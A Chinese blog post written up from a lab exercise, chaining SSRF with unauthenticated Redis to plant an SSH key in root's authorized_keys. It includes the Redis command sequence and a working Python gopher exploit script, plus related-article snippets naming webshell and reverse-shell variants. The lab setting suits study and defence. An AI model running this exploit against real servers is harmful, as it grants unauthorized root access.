SSRF+Redis写入公钥

最新推荐文章于 2025-03-31 22:16:57 发布
最新推荐文章于 2025-03-31 22:16:57 发布
阅读量3.5k 收藏 6
点赞数 1
分类专栏: 数据库安全 SSRF 文章标签: 数据库 centos linux 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/115416847
版权
该实验通过在Kali Linux上生成公私钥对,利用CentOS8上Redis服务的未授权访问和Windows10上的SSRF漏洞,将公钥写入目标服务器的SSH授权文件,最终实现无需密码的远程登录。实验步骤包括在Kali生成公钥,构造Redis数据包,编写并执行exploit脚本,以及验证在CentOS8上的公钥写入成功,并通过SSH直接登录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

野径云俱黑,江船火独明。


实验环境

主机角色描述
centos8受害服务器运行redis数据库(未授权访问)
window10跳板服务器含有ssrf漏洞
kali攻击者利用ssrf+redis未授权访问写入公钥登录centos8

实验准备

思路:

先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。

条件:

1、redis服务使用root账号启动,这时候才有切换目录写入文件的权限(实验中可以临时执行sudo -u root /usr/bin/redis-server/etc/redis/redis.conf来以root权限执行)

2、服务器开放了SSH服务,而且允许使用密钥登录,即可以远程写入一个公钥,直接远程登录服务器。


实验过程

kali在本地生产公私钥:

image-20210403144255584

image-20210403144316105

如图所示,成功生成公私钥对。

查看公钥字符串:

image-20210403144349152

构造reids数据包:

功能是将公钥字符串写入到目标服务器的/root/.ssh/authorized_keys文件中

config set dir /root/.ssh/   #切换到指定目录
config set dbfilename authorized_keys         #备份数据命名为authorized_keys
set qianxun "\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEnwNWKFqDJtta8TD8jHgOZOQY//GM53NluEkGAygMttlPhk/tuwgd5nAUUhRM+jMsgVSlLHduhWTGzXsWgjndCuETwXnKsZiMQNOgGBcwiPZ50W+Fz63Xd0MZAHdInhltjAoMfZX9pBh9kWX3BbXb463cNQGMm1/xU8JParPmgNkt+pJetvjlRCNirSxwxEdR9BwNImcuorotUMkMMSsKXurrmo7QqhWaV6PDgDVGbXc+Nj3ZLdJoSThNXjmdS6miA0Lvli2w4Gl+MTFSm1nQkSfAHPvxcBNLnOj16KScEa7WwetDd9hdbRJOyLdgxT0hbHWjKx7Eb4k7EF9dmobOSSs9k101tEntIes1Y1fa+LAThQwou99SmT7+j6zVj1+6KRiHepnNU3VnoAqZ/A3w+K9OgJvGfN4wx3SNQIyKrnF2UjVysevSpQPQsay1/HLqnNtCgvVz9Hib4ZAW+NBvuWAh/7KL4T9f94vdXU/F4dWd0T+umJ6DHBBi5W44gSE= root@kali\\n\\n"   #设置公钥(注意转义)
save    #保存
quit    #退出

结合构造的redis数据包,编写exp脚本:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib.request
from urllib.parse import quote

url = "http://222.24.28.207/ssrf/curl_exec.php?url="    #windows上搭建的ssrf漏洞页面
gopher = "gopher://222.24.28.100:6379/_"

# 攻击脚本
data = """
config set dir /root/.ssh/
config set dbfilename authorized_keys
set qianxun "\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEnwNWKFqDJtta8TD8jHgOZOQY//GM53NluEkGAygMttlPhk/tuwgd5nAUUhRM+jMsgVSlLHduhWTGzXsWgjndCuETwXnKsZiMQNOgGBcwiPZ50W+Fz63Xd0MZAHdInhltjAoMfZX9pBh9kWX3BbXb463cNQGMm1/xU8JParPmgNkt+pJetvjlRCNirSxwxEdR9BwNImcuorotUMkMMSsKXurrmo7QqhWaV6PDgDVGbXc+Nj3ZLdJoSThNXjmdS6miA0Lvli2w4Gl+MTFSm1nQkSfAHPvxcBNLnOj16KScEa7WwetDd9hdbRJOyLdgxT0hbHWjKx7Eb4k7EF9dmobOSSs9k101tEntIes1Y1fa+LAThQwou99SmT7+j6zVj1+6KRiHepnNU3VnoAqZ/A3w+K9OgJvGfN4wx3SNQIyKrnF2UjVysevSpQPQsay1/HLqnNtCgvVz9Hib4ZAW+NBvuWAh/7KL4T9f94vdXU/F4dWd0T+umJ6DHBBi5W44gSE= root@kali\\n\\n"
save
quit
"""
def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

print(encoder)
# 生成payload
payload = url + quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib.request.Request(payload)
response = urllib.request.urlopen(request).read()
print(response)

运行脚本:

image-20210403150937959

image-20210403151003496

切换视角,在centos8上查看:

image-20210403150913612

如图所示,文件已被成功写入!

返回kali,直接用ssh登录centos

image-20210403152500023

成功!

后记

本次实验主要利用的是redis的未授权访问(或者弱口令)以及redis的数据备份功能,将自己的公钥写入目标服务器的/root/.ssh/authorized_keys文件中,直接登录目标服务器。此操作需要redis使用root权限运行,这样才能切换目录写文件,然后服务器必须开启ssh服务,二者缺一不可。

ssrf结合redis写入公钥
m0_65540912的博客
07-05 1271
我这里用了Web-Redis-Lab漏洞环境来演示攻击机kali:192.168.168.128。
Root me CTF all the day靶场ssrf+redis漏洞
M372109150的博客
10-10 1639
本篇介绍了root me CTF all the day靶场的SSRF BOX中的漏洞,使用SSRF+redis 获取内网主机权限,利用SSRF来对redis的未授权访问执行命令。从而达到获取主机权限的目的。
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2857
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
利用 SSRFRedis 未授权访问进行内网渗透
最新发布
智商不在服务区的博客
03-31 867
在本次实验中,我们使用 Docker 环境进行测试。解压实验包,搭建docker环境。docker环境web的dockerfile主要利用代码redis服务器通过启动相关容器,初次启动失败。发现docker版本问题,删除docker版本 3,并尝试重新拉取重新启动后,环境成功搭建,获取内网 IP。我们使用抓包工具检测内网存活主机,发现172.18.0.2存在HTTP服务,并返回Go away。使用burpsuite对172.18.0.2进行端口扫描,发现6379端口返回Redis
Xshell工具利用Redis 6379写入SSH公钥漏洞
maple_leaf
05-03 702
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)
L2329794714的博客
11-20 3454
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
SSRF 302跳转攻击redis写入ssh公钥实现远程登录
m0_70638961的博客
08-24 650
ssh -i id_rsa root@IP地址登录成功。
SSRF+redis未授权漏洞复现
2302_80859314的博客
08-24 528
SSRF(Server-Side Request Forgery)即服务器端请求伪造,是一种由攻击者构造攻击链传给服务器,服务器执行并发起请求造成安全问题的漏洞,一般用来在外网探测或攻击内网服务。当网站需要调用指定URL地址的资源,但是没有对这个URL做好过滤,就会导致可以访问任意地址。
SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1432
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
ssrf+redis
qq_45213259的博客
11-30 3974
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机中搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机中安装redis vps:windows10(本机) ip:10.133.164.81 在windows中安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 5054
利用redis的备份功能,写入ssh公钥
13,Redis备份写入Shell以及公钥
m0_64040060的博客
09-24 507
1. redis服务绑定在0.0.0.0:6379端口,而且信任了其他IP,导致了Redis服务暴露在公网上。3.如果Redis服务以root身份运行,可以给root用户写入SSH公钥文件,直接通过SSH登陆服务器。浏览器访问: http://127.0.0.1/demo.php?输入save保存即可在访问在/var/www/html下的demo.php。启动Redis服务: # ./redis-server。a、redis 服务以 root 账户运行。连接Redis服务: # ./redis-cli。
记一次学习过程(redis的编译安装,以及有关redis漏洞的学习,包括redis未授权写入ssh公钥redis写入木马、redis主从复制漏洞linux版)同时记录几个威胁分析平台
banliyaoguai的博客
08-03 1072
这个东西的流程是你发现了一个网站,然后你扫描对方端口,发现6379端口开着,而且通过一些其他漏洞可以登陆上redis后,你在redis中执行操作获取webshell权限。测试公私钥的时候不要在你的攻击机子和redis的服务器的机子上测试,或者你把测试完成的文件在服务器上删掉,删掉之前记得保存。这个是你冒充redis的主服务器,让redis从服务器下载木马(这里使用工具)这是你已经连接上了redis,你在redis中操作,在redis写入公钥。(下图是测试出现问题的情况,没出现问题的情况忘记截图了)
ssh写入公钥
qq_43583125的博客
10-21 302
win2016的gitbash写入ssh root @10.9.75.215。win7:攻击者主机,需要把自己的公钥到受害者服务器的.ssh目录下。kali:模拟受害者服务器,需要ssh服务开启,有自己的公钥私钥。下面相当于通过命令执行漏洞写入公钥
公钥写入被管理机
weixin_30764771的博客
11-30 167
ssh-copy-id -i ~/.ssh/id_rsa.pub "-p 22 root@192.168.12.129" 转载于:https://www.cnblogs.com/timlong/p/10042635.html
Redis数据库未授权私钥
weixin_61425169的博客
02-20 900
Redis是一个key-value存储系统,拥有很强大的功能,redis是用ANSI C语言编、支持网络、可基于内存和可持久化的日志型键值对数据库,并提供多种语言的API。reids默认端口是6379。
自动生成公钥并自动写入到特定服务器脚本
weixin_33978044的博客
05-04 198
自动生成公钥并自动写入到特定服务器脚本普遍账号需开的sudo权限zhi.yang ALL=(ALL:ALL)NOPASSWD:/usr/bin/tee -a /root/.ssh/authorized_keys,/bin/mkdir /log/*# expect/usr/local/bin/sshkey.exp 10.0.0.3 shaa01 zhi.yang xxxxx...
批量写入redis
~
03-13 269
批量写入redis key := GetSeriesKey(series.Id) idNames = append(idNames, key, series.Name) if k%10 == 9 { err = Mset(idNames...) if err != nil ...
redis 密钥登陆ssh
干铮的博客
01-31 1865
redis密钥登陆ssh 1.生成密钥 ssh-keygen -t rsa 2.防止乱码导入到key文件中 (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt cat key.txt | redis-cli -h 192.168.3.26 --pass 123456 -x set xxx --pass是登录密码 无密码可不填 redis-cli -h 192.168.3.26 config set dir /ro
SSRF+redis
08-24
SSRF redis是指通过Server-Side Request Forgery (SSRF)攻击技术利用redis未授权访问漏洞的组合。SSRF漏洞可以让攻击者发送伪造的请求,使服务器在攻击者的控制下发送请求到内部网络或其他外部系统。而redis未授权访问漏洞指的是redis数据库未经任何身份验证就可以被访问和控制的漏洞。通过这两种漏洞的结合,攻击者可以利用SSRF漏洞请求含有未授权访问漏洞的redis,然后通过redis的数据备份功能将恶意代码写入服务器的定时文件中,最终实现反弹shell攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ssrf+redis](https://blog.csdn.net/qq_45213259/article/details/110352124)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [SSRF+Redis组合拳啊哒~](https://blog.csdn.net/qq_43665434/article/details/115408269)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值